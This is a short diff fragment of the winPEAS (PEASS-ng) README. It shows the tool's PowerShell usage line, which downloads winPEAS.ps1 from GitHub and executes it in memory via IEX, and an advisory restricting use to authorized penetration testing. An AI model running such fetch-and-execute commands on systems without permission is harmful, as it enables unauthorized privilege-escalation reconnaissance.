@ -17,10 +17,8 @@ Download the **[latest releas from here](https://github.com/peass-ng/PEASS-ng/re
```bash ```bash
powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')" powershell "IEX(New-Object Net.WebClient).downloadString('https://raw.githubusercontent.com/peass-ng/PEASS-ng/master/winPEAS/winPEASps1/winPEAS.ps1')"
```
## Advisory ## Advisory
All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission. All the scripts/binaries of the PEAS Suite should be used for authorized penetration testing and/or educational purposes only. Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own networks and/or with the network owner's permission.
By Polop